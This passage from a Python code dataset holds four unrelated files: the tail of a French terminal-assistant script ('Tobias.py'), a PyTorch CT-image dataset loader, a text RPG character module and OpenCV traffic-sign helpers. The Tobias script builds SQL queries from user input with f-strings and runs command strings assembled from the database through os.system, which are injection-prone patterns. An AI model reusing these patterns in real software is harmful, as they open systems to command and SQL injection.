\\n : \")\n right = 0\n for i in range(len(blocDisplayed)):\n if blocToSelect != blocDisplayed[i] :\n right += 1\n if right == len(blocDisplayed) :\n print(\"Votre bloc n'existe pas\")\n time.sleep(0.5)\n self.fill()\n else :\n self.blocList.append(blocToSelect)\n self.fill()\n\n elif nextAction == \"2\" :\n count = 0 \n blocToSearchFor = input(\"Quel est son nom ? \\n : \")\n for i in range(len(blocDisplayed)):\n if blocDisplayed[i].count(blocToSearchFor) > 0:\n count +=1 \n print(f\"Bloc correspondant à la description {blocDisplayed[i]}\\n ------\")\n answer = input(\"Lequel est ce ? [nom/aucun] \\n ----> Votre choix : \")\n if answer == \"aucun \":\n self.fill()\n else : \n self.blocList.append(answer)\n self.fill()\n \n if count == 0:\n print(\"Votre bloc n'existe pas\")\n self.fill()\n\n elif nextAction == \"3\":\n if len(self.blocList) != 0:\n self.save()\n self.feature()\n else :\n print(\"[!] Votre pioche est vide...\")\n time.sleep(0.5)\n self.fill()\n\n elif nextAction == \"4\":\n if len(self.blocList) != 0:\n if len(self.blocList) == 1 : \n self.blocList.remove(self.blocList[0])\n self.fill()\n \n name = input(\"Nom du bloc à retirer \\n : \")\n \n if len(self.blocList) >1 : \n self.blocList.remove(name)\n self.fill()\n else :\n print(\"[!] Votre pioche est vide...\")\n time.sleep(0.5)\n self.fill()\n\n elif nextAction == \"5\":\n os.system(\"clear\")\n self.choiceList()\n\n else :\n self.fill()\n\n def save(self):\n os.system(\"clear\")\n foncName = input(\"Nom de la fonctionnalité ? \\n : \")\n indexObjets = []\n nObjets = len(self.blocList)\n\n #Récupérer les éléments\n indexObjets = self.blocList\n\n if nObjets > 0:\n Command = self.mydb.cursor()\n Command.execute(\"USE tobiasdb\")\n\n Command.execute(f\"INSERT INTO creator (id , name , type , command , category,pattern) VALUES (NULL , '{foncName}' , 'Feature' , \\\"{indexObjets}\\\", 'Primaire',0)\")\n self.mydb.commit()\n # Tools().Notification(\"Feature Successfully Added\")\n os.system(\"clear\")\n self.choiceList()\n\n def createFeature(self):\n os.system(\"clear\")\n self.fill()\n\n def feature(self):\n self.MagicWord=self.getModuleData(\"localDbPassword\",\"Tobias\")\n self.featureContent = []\n self.mydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n passwd=self.MagicWord, port=\"8889\",\n )\n\n Command = self.mydb.cursor()\n Command.execute(\"USE tobiasdb\")\n Command.execute(\"SELECT DISTINCT(name) FROM creator WHERE type='Feature'\")\n\n for x in Command:\n for lettre in x :\n self.featureContent.append(lettre)\n\n os.system(\"clear\")\n print(f\"Liste des fonctionnalités : {self.featureContent}\")\n featureToExecute = input(\"Que voulez vous éxecuter ? 
\\n : \")\n\n pattern = []\n\n self.mydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n passwd=self.MagicWord, port=\"8889\",\n )\n\n #Déterminer les éléments de type Fonctionnalité\n\n Command = self.mydb.cursor()\n Command.execute(\"USE tobiasdb\")\n Command.execute(f\"SELECT command FROM creator WHERE name='{featureToExecute}' AND category !='Script'\")\n\n for x in Command:\n for lettre in x :\n pass\n\n lettre = str(lettre)\n lettre = lettre.strip(\"[]\")\n lettre = lettre.replace(\"',\",\"\")\n lettre = lettre.replace(\"'\",\"\")\n firstStageCommands = lettre.split()\n\n #Déterminer les commandes de ces éléments\n for i in range(0,len(firstStageCommands)):\n Command = self.mydb.cursor()\n Command.execute(\"USE tobiasdb\")\n Command.execute(\"SELECT command FROM creator WHERE name='\"+firstStageCommands[i]+\"' AND type='Bloc' AND category!='Script'\")\n for x in Command:\n for lettre in x :\n firstStageCommands[i] = lettre\n\n for i in range(0,len(firstStageCommands)):\n Command = self.mydb.cursor()\n Command.execute(\"USE tobiasdb\")\n Command.execute(f\"SELECT command FROM creator WHERE name='{firstStageCommands[i]}' AND type='Bloc' AND category='Script'\")\n for x in Command:\n for lettre in x :\n a = subprocess.getoutput(lettre)\n firstStageCommands[i] = a\n pattern.append(a)\n\n Command = self.mydb.cursor()\n Command.execute(\"USE tobiasdb\")\n Command.execute(\"SELECT pattern FROM creator WHERE command='\"+lettre+\"' AND type='Bloc' AND category='Script'\")\n for x in Command:\n for lettre in x:\n pattern.append(lettre)\n\n #Check for Pattern\n for i in range(0,len(firstStageCommands)):\n Command = self.mydb.cursor()\n Command.execute(\"USE tobiasdb\")\n Command.execute(\"SELECT command,pattern FROM creator WHERE command='\"+firstStageCommands[i]+\"' AND type='Bloc' AND category='Secondaire'\")\n for x in Command:\n for lettre in x :\n pattern.append(lettre)\n\n list_of_strings = [str(s) for s in firstStageCommands]\n joined_string = \" \".join(list_of_strings)\n string = joined_string.split()\n stringList = []\n for i in range(0,len(string)):\n stringList.append(string[i])\n stringList.append(\" \")\n workingUnits = []\n byOne = []\n #Détermine les secteurs ayant besoin d'une modification\n pos = []\n var_pos = 0\n for sector in stringList:\n num = sector.count(\"$\")\n if num > 0:\n workingUnits.append(sector)\n pos.append(var_pos)\n var_pos +=1\n else :\n var_pos +=1\n\n #Change le string en liste de caractères\n for elements in range(0,len(workingUnits)):\n elementString = workingUnits[elements]\n for caracter in range(0,len(elementString)):\n byOne.append(elementString[caracter])\n byOne.append(\" \")\n\n byOne = byOne[:-1]\n val = 0\n #Change $n par la bonne valeur du pattern\n for cell in range(0,len(byOne)):\n if byOne[cell] == \"$\":\n if int(byOne[cell+1]) == 1:\n val = -1\n elif int(byOne[cell+1]) == 2:\n val = 0\n else :\n val +=1\n\n byOne[cell+1] = pattern[int(byOne[cell+1])+val]\n\n final = \"\"\n for i in byOne:\n final = final+str(i)\n final = final.replace(\"$\",\"\")\n final = final.split()\n\n finalList = []\n for i in range(0,len(final)):\n finalList.append(final[i])\n\n for i in range(0,len(stringList)):\n for y in range(0,len(pattern)):\n if stringList[i] == pattern[y]:\n stringList[i] = \" \"\n\n for i in range(0,len(pos)):\n stringList[pos[i]] = finalList[i]\n\n full = stringList\n if stringList.count(\"X1\") > 0:\n #TROUVER LA BOUCLE\n position = 0\n indexGet = []\n\n for i in range (0,len(stringList)):\n if stringList[i] == 
\"for\":\n indexGet.append(position)\n position +=1\n elif stringList[i] == \"end\" :\n indexGet.append(position)\n position +=1\n else :\n position +=1\n\n #TROUVER LE COMMENCEMENT ET LA FIN\n doing = []\n i = 0\n while i != int(len(indexGet)):\n start = indexGet[i]\n end = indexGet[i+1]\n\n start = int(start)\n end = int(end)\n\n #LES RECUPERER\n condition = stringList[start:end]\n stage_1 = condition[0:9]\n stage_1[6] = stage_1[8]\n numberOT = stage_1[8]\n stage_1.pop(8)\n i = i+2\n condition = stringList[start:end]\n\n condition[6] = stage_1[6]\n condition.pop(8)\n condition.pop(8)\n\n\n #GET THE THINGS THAT NEED TO BE DONE\n do = condition[7:end]\n do = \"\".join(do)\n doing.append(do)\n\n inputs=[]\n #Déterminer les commandes de ces éléments\n\n Command = self.mydb.cursor()\n Command.execute(\"USE tobiasdb\")\n Command.execute(\"SELECT command FROM creator WHERE category='multipleInputs' AND type='Bloc'\")\n for x in Command:\n for lettre in x :\n for i in range(0,len(stringList)):\n if lettre in stringList[i]:\n inputs.append(lettre)\n if len(inputs) == 0:\n inputs.append(numberOT)\n\n numberOI = 0\n try :\n numberOT = int(numberOT)\n numberOI = numberOT\n except:\n numberOT = None\n numberOI = len(inputs)\n\n for i in range(0,numberOI):\n if numberOT is not None:\n a = numberOT\n a = str(a)\n else :\n proc = subprocess.Popen(['python3', inputs[i]], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n a = proc.communicate()[0]\n a = a.decode(\"utf-8\")\n a = str(a)\n a = a.strip(\"[\")\n a = a.strip(\"]\")\n a = a[:-2]\n\n a = a.replace(\"',\",\"\")\n a = a.replace(\"'\",\"\")\n a = a.split()\n i=0\n while i != len(doing):\n word = doing[i]\n word = word.split()\n for k in range(0,len(word)):\n print(word)\n if word[k] == \"X2\":\n for y in range(0,len(a)):\n word[k] = a[y]\n word = \" \".join(word)\n print(word)\n os.system(word)\n word = do.split()\n i +=len(doing)\n\n\n #A REFAIRE\n for i in range(indexGet[0],indexGet[-1]+1):\n full[i] = \"TODELETE\"\n\n\n good = []\n for i in range(0,len(full)):\n if full[i] != \"TODELETE\":\n good.append(full[i])\n\n commande = \"\".join(good)\n print(f\"La commande à éxecuter est : {commande}\")\n os.system(commande)\n else :\n commande = \"\".join(stringList)\n print(f\"La commande à éxecuter est : {commande}\")\n os.system(commande)\n\n def getCommand(self,blocName):\n Command = self.mydb.cursor()\n Command.execute(\"USE tobiasdb\")\n Command.execute(f\"SELECT command FROM creator WHERE name='{blocName}' AND type='Bloc'\")\n\n for x in Command:\n for lettre in x :\n return lettre\n\nclass Tobias(Creator):\n\n def __init__(self):\n self.blocList = []\n self.confs = self.getPaths('path','ConfigurationJson')\n self.networkB = self.getPaths('network','sysCommandsDirectory')\n self.user = os.environ[\"USER\"] #User's name\n\n\n # try :\n # open(f\".started.txt\")\n\n # except IOError:\n\n # self.fromZeroToHero() #Working\n\n threadLogin = threading.Thread(target=self.login())\n threadLogin.start()\n\n def fromZeroToHero(self):\n\n \"\"\"Install needed packages\"\"\"\n packages = [\n \"python-nmap\",\n \"PyQt5\",\n \"notify2\",\n \"django\",\n \"django-debug-toolbar\",\n \"gtts\",\n \"pyshark\",\n \"nginx\",\n \"speechRecognition\" ,\n \"mysql\",\n \"mysql-connector\",\n \"paramiko\",\n \"install --pre scapy[basic]\",\n \"mechanicalsoup\",\n \"beautifulsoup4\",\n \"git\",\n \"pandas\",\n \"unidecode\"\n ]\n\n for i in range (0,len(packages)):\n a = subprocess.getoutput(f\"which {packages[i]}\")\n if a != f\"/usr/bin/{packages[i]}\" :\n 
#print(f\"{packages[i]} is not installed\")\n os.system(f\"pip3 install {packages[i]}\")\n\n os.system(\"clear\")\n\n with open(f\"/Users/{self.user}/Terminal/.started.txt\",\"w\") as variable :\n variable.write(\"Started\")\n\n def myIp(self,toSearch):\n \"\"\"Give my Ip Address and Mask\"\"\"\n if toSearch == \"ip\":\n try :\n\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((\"8.8.8.8\", 80))\n myIp=s.getsockname()[0]\n s.close()\n return myIp\n\n except OSError :\n\n myIp = subprocess.getoutput(\"ip a | egrep 'inet' | egrep 'brd' | awk '{print $2}' | sed -re 's/\\\\/..//g'|head -n1\")\n\n return myIp\n\n finally :\n\n osBasedIp = subprocess.getoutput(\"ip a | egrep 'inet' | egrep 'brd' | awk '{print $2}' | sed -re 's/\\\\/..//g' | head -n1\")\n\n if myIp != osBasedIp :\n raise Exception(\"IP Non concordante\")\n\n elif toSearch == \"mask\":\n\n mask = subprocess.getoutput(\"ip a | egrep \\\"inet\\\" | head -n3 | tail -1 | awk '{print $2}'\")\n return mask\n\n else :\n raise Exception(\"'ip' and 'mask' are the only parameters accepted\")\n\n def retour(self):\n question = input(\"\\nRevenir au menu principal ? [yes/no] \\n > \")\n if question == \"yes\":\n self.start()\n\n def initializeViolet(self):\n os.system(\"cd ./.Violet && ./Violet.py\")\n\n def start(self):\n\n os.system(\"clear\")\n print(f\"----------------- Bonjour {self.getModuleData('prenom')} -----------------\\n\")\n print(f\"[?] Violet : Computer Status --------\\n\")\n if self.myIp('ip') != None :\n print(f\"Network Access : YES \")\n else :\n print(f\"Network Access : NO \")\n\n print(f\"IP Address: {self.myIp('ip')}\")\n\n try :\n open(f\"/Users/{self.user}/Archetype/Tobi/Terminal/.Violet/Report.txt\")\n print(f\"Is Violet deployed : YES\\n\")\n print(\"Violet Report File Content: \\n\")\n with open(f\"/Users/{self.user}/Archetype/Tobi/Terminal/.Violet/Report.txt\",\"r\") as variable:\n print(variable.read()+\"\\n\")\n\n except IOError:\n\n print(f\"Is Violet deployed : NO \\n\")\n\n print(\"|(1) Outils # (2) Réseau # (3) Internet |\\n|(4) Stockage # (5) Serveur # (6) Configuration | \\n|(7) Créateur # (8) LoopSequence # (9) Deploy Violet |\\n\")\n self.chooseAction()\n\n def login(self):\n from Library import toHash\n print(\"--------------- Tobias Login Page : ---------------\\n\")\n username = input(\" Nom d'utilisateur : \")\n password = getpass.getpass(\" Mot de passe : \")\n if username == self.getModuleData(\"prenom\"):\n if toHash.HASH(password) == self.getModuleData(\"password\"):\n self.start()\n else :\n print(\"WRONG PASSWORD\")\n sys.exit(0)\n\n def creator(self):\n self.choiceList()\n\n def chooseAction(self):\n choice = input(\"----> Votre choix : \")\n if choice == \"1\":\n\n os.system(\"clear\")\n print(\"[?] Tobias : Onglet Outil ----\\n\")\n print(\"----- Bloc Note (1) | Handler (2) | Raw (3) -----\\n\")\n\n answer = input(\"----> Votre choix : \")\n if answer == \"1\":\n self.blocNote()\n self.retour()\n\n if answer == \"2\":\n self.handler()\n self.retour()\n\n if answer == \"3\":\n self.raw()\n self.retour()\n\n\n if choice == \"2\":\n os.system(\"clear\")\n print(\"[?] Tobias : Onglet Réseau ----\\n\")\n print(\"----- Page Reseau (1) | Paquet (2) \\n\")\n\n answer = input(\"----> Votre choix : \")\n if answer == \"1\":\n self.pageReseau()\n self.retour()\n\n if answer == \"2\":\n self.paquet()\n self.retour()\n\n\n if choice == \"4\":\n os.system(\"clear\")\n print(\"[?] 
Tobias : Onglet Stockage ----\\n\")\n print(\"----- Coffre Fort (1) | GetFromDb (2) | Archiver\\n\")\n\n answer = input(\"----> Votre choix : \")\n if answer == \"1\":\n self.coffreFort()\n self.retour()\n\n if answer == \"2\":\n self.getFromDb()\n self.retour()\n\n if answer == \"3\":\n self.Archives()\n self.retour()\n\n\n if choice == \"5\":\n os.system(\"clear\")\n print(\"[?] Tobias : Onglet Serveur ----\\n\")\n print(\"----- Page Serveur (1) | Transférer \\n\")\n\n answer = input(\"----> Votre choix : \")\n if answer == \"1\":\n self.pageServeur()\n self.retour()\n\n if answer == \"2\":\n self.transfert()\n self.retour()\n\n\n if choice == \"7\":\n os.system(\"clear\")\n print(\"[?] Tobias : Onglet Créateur ----\\n\")\n self.creator()\n # self.start()\n\n\n elif choice == \"8\" :\n threadLoopSequence = threading.Thread(target=self.loopSequence())\n threadLoopSequence.start()\n self.retour()\n\n elif choice == \"9\" :\n threadViolet = threading.Thread(target=self.initializeViolet())\n threadViolet.start()\n self.retour()\n\n def pageServeur(self):\n pass\n\n def transfert(self):\n pass\n\n def coffreFort(self):\n pass\n\n def getFromDb(self):\n pass\n\n def Archives(self):\n pass\n\n def pageReseau(self):\n pass\n\n def paquet(self):\n pass\n\n def blocNote(self):\n self.notesPath = self.getPaths('noteFile','Notes')\n\n with open(f\"{self.notesPath}\",\"r\") as variable :\n print(variable.read())\n\n def raw(self):\n pass\n\n def handler(self):\n pass\n\n def loopSequence(self):\n\n import time\n from multiprocessing import Process\n\n from Library.NBook import Network\n from Library.RawNetwork import Ally_Computers, internetProtocol\n from Security.Backbone import Backbone\n from Security.Riot import Security\n\n\n \"\"\" Execute every methods in order to make them properly available to the user \"\"\"\n\n print(\"Launching loopSequence\")\n\n\n #BackBone\n if self.getModuleData(\"ipScan\",\"Backbone\") == \"True\" :\n loopBackboneIpScan = threading.Thread(target=Backbone().innerPortScan())\n loopBackboneIpScan.start()\n\n\n if self.getModuleData(\"networkSpace\",\"Backbone\") == \"True\" :\n loopBackboneNetworkSpace = threading.Thread(target=Backbone().networkSpace())\n loopBackboneNetworkSpace.start()\n\n if self.getModuleData(\"allow/Deny access\",\"Backbone\") == \"True\" :\n loopBackbone = threading.Thread(target=Backbone().Etapes_de_Fonctionnement())\n loopBackbone.start()\n\n # Riot\n if self.getModuleData(\"authorized_keys\",\"Riot\") == \"True\" :\n loopRiot = threading.Thread(target=Security().autorized_keysCheck())\n loopRiot.start()\n\n # if self.getModuleData(\"crontabCheck\",\"Riot\") == \"True\" :\n # print(\"starting\")\n # loopCrontab = threading.Thread(target=Security().crontabCheck())\n # loopCrontab.start()\n\n if self.getModuleData(\"connexions\",\"Riot\") == \"True\" :\n loopRiot = threading.Thread(target=Security().connexion())\n loopRiot.start()\n\n if self.getModuleData(\"processus\",\"Riot\") == \"True\" :\n loopRiotProc = threading.Thread(target=Security().Processus())\n loopRiotProc.start()\n\n #RawNetwork\n # if self.getModuleData(\"AllyComputer\",\"General\") == \"True\" :\n # self.threads(Ally_Computers().Main())\n\n if self.getModuleData(\"Internet Protocol\",\"General\") == \"True\" :\n loopRaw = threading.Thread(target=internetProtocol().Main())\n loopRaw.start()\n\n def getModuleData(self,searchingFor,fieldName='user'):\n import json\n with open(f\"{self.confs}\",\"r\") as config :\n content = json.load(config)\n\n for parameters in 
content['Configurations'] :\n for keys,values in parameters[fieldName].items() :\n if searchingFor == keys :\n return values\n\n def getPaths(self,searchingFor,fieldName='Archives'):\n\n with open(f\"Settings/Paths/filesPaths.json\",\"r\") as variable:\n content = json.load(variable)\n\n for parameters in content['Paths'] :\n for keys,values in parameters[fieldName].items() :\n if searchingFor == keys :\n return values\n\n#Tobias Main Task\nif __name__ == \"__main__\":\n Tobias()\n # creatorDebug = Creator()\n\n\n\n\n","sub_path":"Terminal/Tobias.py","file_name":"Tobias.py","file_ext":"py","file_size_in_byte":30935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"367247496","text":"import os\n\nimport torch\nfrom torch.utils.data import Dataset as dataset\nimport SimpleITK as sitk\nimport numpy as np\n\n\nclass Dataset(dataset):\n def __init__(self, CT_dir, GT_dir):\n\n self.CT_list = list(map(lambda x: os.path.join(CT_dir, x), os.listdir(CT_dir)))\n self.GT_list = list(map(lambda x: os.path.join(GT_dir, x), os.listdir(GT_dir)))\n\n\n def __getitem__(self, index):\n\n CT_path = self.CT_list[index]\n GT_path = self.GT_list[index]\n\n # 将CT和金标准读入到内存中\n CT = sitk.ReadImage(CT_path)\n GT = sitk.ReadImage(GT_path)\n\n CT_nd = sitk.GetArrayFromImage(CT)\n GT_nd = sitk.GetArrayFromImage(GT)\n\n if len(CT_nd.shape) == 2:\n CT_nd = np.expand_dims(CT_nd, axis=2)\n GT_nd=np.expand_dims(GT_nd,axis=2)\n # HWC to CHW\n CT = CT_nd.transpose((2, 0, 1))\n GT=GT_nd.transpose((2,0,1))\n\n # 处理完毕,将array转换为tensor\n CT_array = torch.from_numpy(CT).float()\n GT_array = torch.from_numpy(GT).float().squeeze(0)\n\n return CT_array, GT_array\n\n def __len__(self):\n\n return len(self.CT_list)\n\nCT_dir = \"/share/xianqim/UNet/data/img_process_600\"\nGT_dir = \"/share/xianqim/UNet/data/label_600\"\n\nData2d = Dataset(CT_dir, GT_dir)\n\n\n","sub_path":"dataloaders/Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"284921269","text":"import random, sys\r\n\r\ndef roll():\r\n return random.randint(1, 20)\r\n\r\nclass character:\r\n def __init__(self,name,age,home,intel,char,agil,stre,luck,type, life, batt):\r\n self.name = name\r\n self.age = age\r\n self.home = home\r\n self.intel = intel\r\n self.char = char\r\n self.agil = agil\r\n self.stre = stre\r\n self.luck = luck\r\n self.type = type\r\n self.life = life\r\n self.batt = batt\r\n\r\ndef translate(word):\r\n lordex = 0\r\n lord = \"\"\r\n for letter in word:\r\n if random.randint(1,5) > 3:\r\n if letter.lower() in \"aiu\":\r\n letter = \"o\"\r\n lord += letter\r\n elif letter.lower() in \"eoy\":\r\n letter = \"i\"\r\n lord += letter\r\n elif letter.lower() in \"h\":\r\n letter = \"u\"\r\n lord += letter\r\n elif letter.lower() in \"spt\":\r\n letter = \"z\"\r\n lord += letter\r\n elif letter.lower() in \"mlt\":\r\n letter = \"n\"\r\n lord += letter\r\n elif letter.lower() in \"djz\":\r\n letter = \"ch\"\r\n lord += letter\r\n elif letter.lower() in \"nv\":\r\n letter = \"m\"\r\n lord += letter\r\n else:\r\n lord += letter\r\n # print(letter)\r\n return lord\r\n\r\ndef fight(good, bad):\r\n atk = good.stre+random.randint(-3,7)\r\n if atk < 0:\r\n atk = 0\r\n bad.life = bad.life - atk\r\n if bad.life < 1:\r\n print(\"\\nYou caused \" + str(atk) + \" damage...\\n\" + bad.name + \" has been destroyed.\\n\")\r\n return \"break\"\r\n else:\r\n print(\"\\nYour attack did \" + str(atk) 
+ \" damage.\")\r\n print(bad.name + \" is still alive with \" + str(bad.life) +\r\n \" life points remaining.\")\r\n atk = bad.stre + random.randint(-3, 5)\r\n if atk < 0:\r\n atk = 0\r\n good.life = good.life - atk\r\n if good.life > 0:\r\n print(\"\\n\" + bad.name + \" attacked you and caused \" + str(atk) + \" damage...\\nYou have \" + str(good.life) + \" remaining.\\n\")\r\n else:\r\n print(\"\\n\" + bad.name + \" attacked you with \" + str(atk) + \" damage...\\nYou died.\\n\\n\")\r\n sys.exit()\r\n\r\ndef stats(npc):\r\n return (\"name: \" + npc.name + \"\\nhome town: \" + npc.home + \"\\nage: \" + str(npc.age) + \"\\ntype: \" + str(npc.type) +\r\n \"\\n\\nintelligence: \" + str(npc.intel) + \"\\ncharisma: \" + str(npc.char) +\r\n \"\\nagillity: \" + str(npc.agil) + \"\\nstrength: \" + str(npc.stre) +\r\n \"\\nLife points: \" + str(npc.life) + \"\\n\")\r\n\r\ndef action(hero,npc):\r\n choice = input(\"what do you want to do: \").lower()\r\n if \"fight\" in choice:\r\n hero.batt = True\r\n if fight(hero, npc) == \"break\":\r\n return \"break\"\r\n hero.batt = True\r\n elif \"leave\" in choice:\r\n if hero.batt == True:\r\n if roll() + hero.luck > npc.life:\r\n print(\"You've succesfully escaped.\")\r\n return \"break\"\r\n else:\r\n print(\"\\nYou can't do that now.\")\r\n atk = npc.stre + random.randint(-3, 5)\r\n if atk < 0:\r\n atk = 0\r\n hero.life = hero.life - atk\r\n if hero.life > 0:\r\n print(npc.name + \" attacked you and caused \" + str(atk) + \" damage...\\nYou have \" + str(\r\n hero.life) + \" remaining.\\n\")\r\n else:\r\n print(npc.name + \" attacked you with \" + str(atk) + \" damage...\\nYou died.\")\r\n return \"break\"\r\n sys.exit()\r\n else:\r\n print(\"You walk away\")\r\n return \"break\"\r\n elif \"stat\" in choice:\r\n print(stats(npc))\r\n elif \"talk\" in choice:\r\n if hero.batt == False:\r\n if hero.char >= npc.char:\r\n if npc.talked == False:\r\n talk_list = open(\"/Users/Axyl Brosseau/PycharmProjects/role playing adventure/\" + npc.type + \"_dialogue\", \"r\")\r\n speech = \"My name is, \" + npc.name.title() + \". 
\" + random.choice(list(talk_list)).lower().capitalize().replace(\"\\n\", \"\")\r\n talk_list.close()\r\n print(npc.name + \" says, \\\"\" + speech + \"\\\"\")\r\n npc.talked = True\r\n else:\r\n talk_list = open( \"/Users/Axyl Brosseau/PycharmProjects/role playing adventure/\" + npc.type + \"_dialogue\", \"r\")\r\n speech = random.choice(list(talk_list)).lower().capitalize().replace(\"\\n\", \"\")\r\n talk_list.close()\r\n print(npc.name + \" says, \\\"\" + speech + \"\\\"\")\r\n else:\r\n talk_list = open(\"/Users/Axyl Brosseau/PycharmProjects/role playing adventure/\" + npc.type + \"_bad_dialogue\", \"r\")\r\n speech = random.choice(list(talk_list)).lower().capitalize().replace(\"\\n\", \"\")\r\n talk_list.close()\r\n print(npc.name + \" says, \\\"\" + speech + \"\\\"\")\r\n else:\r\n print(\"It's too late for words!\")\r\n\r\ndef enemy():\r\n\r\n name_list = open(\"/Users/Axyl Brosseau/PycharmProjects/role playing adventure/names\", \"r\")\r\n name = translate(random.choice(list(name_list))).lower().title()\r\n name_list.close()\r\n\r\n if random.randint(1,35) == 1:\r\n age = random.randint(3,200)\r\n elif random.randint(1,12) == 1:\r\n age = random.randint(6,105)\r\n else:\r\n age = random.randint(10,65)\r\n\r\n skillpts = 20\r\n try:\r\n if random.randint(0,15) < 6:\r\n intel = random.randint(0, 12)\r\n skillpts = skillpts - intel\r\n char = random.randint(0, 7)\r\n skillpts = skillpts - char\r\n agil = random.randint(0, 5)\r\n skillpts = skillpts - agil\r\n stre = random.randint(0, skillpts)\r\n skillpts = skillpts - stre\r\n luck = skillpts\r\n elif random.randint(0,15) > 9:\r\n intel = random.randint(0, 5)\r\n skillpts = skillpts - intel\r\n char = random.randint(0, 6)\r\n skillpts = skillpts - char\r\n agil = random.randint(0, 7)\r\n skillpts = skillpts - agil\r\n stre = random.randint(0, skillpts)\r\n skillpts = skillpts - stre\r\n luck = skillpts\r\n else:\r\n intel = random.randint(2, 6)\r\n skillpts = skillpts - intel\r\n char = random.randint(2, 6)\r\n skillpts = skillpts - char\r\n agil = random.randint(2, 6)\r\n skillpts = skillpts - agil\r\n stre = random.randint(0, skillpts)\r\n skillpts = skillpts - stre\r\n luck = skillpts\r\n except:\r\n intel = random.randint(3, 7)\r\n char = random.randint(2, 6)\r\n agil = random.randint(2, 7)\r\n stre = random.randint(2, 8)\r\n luck = random.randint(2, 8)\r\n type_try = random.randint(1, 7)\r\n if type_try == 1:\r\n type = \"wizard\"\r\n intel += 4\r\n luck += 2\r\n life = 20+stre+(luck%4)\r\n elif type_try == 2:\r\n type = \"thief\"\r\n agil += 3\r\n luck += 2\r\n life = 17+stre+(luck%4)\r\n elif type_try == 3:\r\n type = \"warrior\"\r\n stre += 2\r\n char += 2\r\n life = 23+stre+(luck%4)\r\n elif type_try == 4:\r\n type = \"orc\"\r\n stre += 5\r\n life = 25+stre+(luck%4)\r\n else:\r\n type = \"villager\"\r\n stre = stre%4\r\n life = 5+stre+(luck%4)\r\n\r\n\r\n town_list = open(\"/Users/Axyl Brosseau/PycharmProjects/role playing adventure/towns\", \"r\")\r\n town = translate(random.choice(list(town_list))).lower().title()\r\n town_list.close()\r\n\r\n if age < 26:\r\n agil += 3\r\n elif age < 40:\r\n stre += 3\r\n elif age < 50:\r\n char += 3\r\n elif age < 70:\r\n intel += 3\r\n else:\r\n luck += 3\r\n talked = False\r\n new_bad = [name, age, town, intel, char, agil, stre, luck, type, life, talked]\r\n return new_bad","sub_path":"characters.py","file_name":"characters.py","file_ext":"py","file_size_in_byte":8045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} 
+{"seq_id":"370065284","text":"import cv2\nimport numpy as np\nimport copy\nimport math\n\n\ndef show_img(str, img):\n cv2.imshow(str, img)\n cv2.waitKey(0)\n\n\ndef line_angle(line):\n x1, y1 = line[0:2]\n x2, y2 = line[2:]\n\n if y1 - y2 == 0:\n return 0\n\n if x1 - x2 == 0:\n return 90\n\n angle = np.rad2deg(np.arctan2(y2 - y1, x2 - x1))\n\n # make it in multiplcation of 5\n angle = 5 * (int(angle / 5))\n return angle\n\n\ndef filter_angles(lines, angles):\n lines_filtered = [line for line in lines if line_angle(line) in angles]\n return lines_filtered\n\n\ndef mark_traffic_signs(image_in, signs_dict):\n img = image_in.copy()\n for sign_name, center in signs_dict.items():\n x, y = int(center[0]), int(center[1])\n text = \"(({},{}),'{}')\".format(x, y, sign_name)\n xs, ys = image_in.shape[0], image_in.shape[1]\n orgx = x + 50 if x + 50 + 200 < xs else x - 200\n orgy = y\n cv2.putText(img, text, (orgx, orgy), cv2.FONT_HERSHEY_SIMPLEX, .5, (0, 0, 0))\n cv2.putText(img, \"*\", (x - 8, y + 9), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), thickness=2)\n return img\n\n\ndef draw_tl_center(image_in, center, state):\n img = image_in.copy()\n x, y = int(center[0]), int(center[1])\n text = \"(({},{}),'{}')\".format(x, y, state)\n xs, ys = image_in.shape[0], image_in.shape[1]\n orgx = x + 50 if x + 50 + 200 < xs else x - 200\n orgy = y\n cv2.putText(img, text, (orgx, orgy), cv2.FONT_HERSHEY_SIMPLEX, .5, (0, 0, 0))\n cv2.putText(img, \"*\", (x - 8, y + 9), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), thickness=2)\n return img\n\n\ndef get_midpt(line):\n x1, y1 = line[0], line[1]\n x2, y2 = line[2], line[3]\n return [(x1 / 2) + (x2 / 2), (y1 / 2) + (y2 / 2)]\n\n\ndef get_length(line):\n x1, y1 = line[0], line[1]\n x2, y2 = line[2], line[3]\n length = math.sqrt(abs(x1 - x2) ** 2 + abs(y1 - y2) ** 2)\n return length\n\n\ndef get_centers(lines):\n m = 0\n l1m = None\n l2m = None\n for l1 in lines:\n for l2 in lines:\n if tuple(l1) == tuple(l2):\n continue\n l1c = get_midpt(l1)\n l2c = get_midpt(l2)\n distance = get_length([l1c[0], l1c[1], l2c[0], l2c[1]])\n if m < distance:\n m = distance\n l1m = l1\n l2m = l2\n l1c = get_midpt(l1m)\n l2c = get_midpt(l2m)\n center = get_midpt([l1c[0], l1c[1], l2c[0], l2c[1]])\n return center\n\n\ndef get_square_centers(lines):\n # filter lines with +45 and -45 angles\n side_45 = filter_angles(lines, [45])\n side__45 = filter_angles(lines, [-45])\n\n # list of set of square lines\n squares = []\n for line1 in side_45:\n l1c = get_midpt(line1)\n for line2 in side__45:\n l2c = get_midpt(line2)\n \"\"\"\n if both lines are almost same length and \n either their mid point x values or mid point y values are approximately the same\n then they belong to the same set of square\n \"\"\"\n if ((abs(get_length(line1) - get_length(line2)) < 3)\n and ((abs(l1c[0] - l2c[0]) < 3) or (abs(l1c[1] - l2c[1]) < 3))):\n placed = False\n l1 = tuple(line1)\n l2 = tuple(line2)\n if len(squares) != 0:\n for square in squares:\n if l1 in square or l2 in square:\n square.add(l1)\n square.add(l2)\n placed = True\n if not placed:\n square = set({l1, l2})\n squares.append(square)\n\n print(squares)\n # for square in squares:\n # for line in square:\n # #cv2.line(sign_draw, (line[0], line[1]), (line[2], line[3]), (0, 0, 255), 2)\n # x, y = line[0],line[1]\n # cv2.putText(sign_draw, \"*\", (int(x), int(y)), 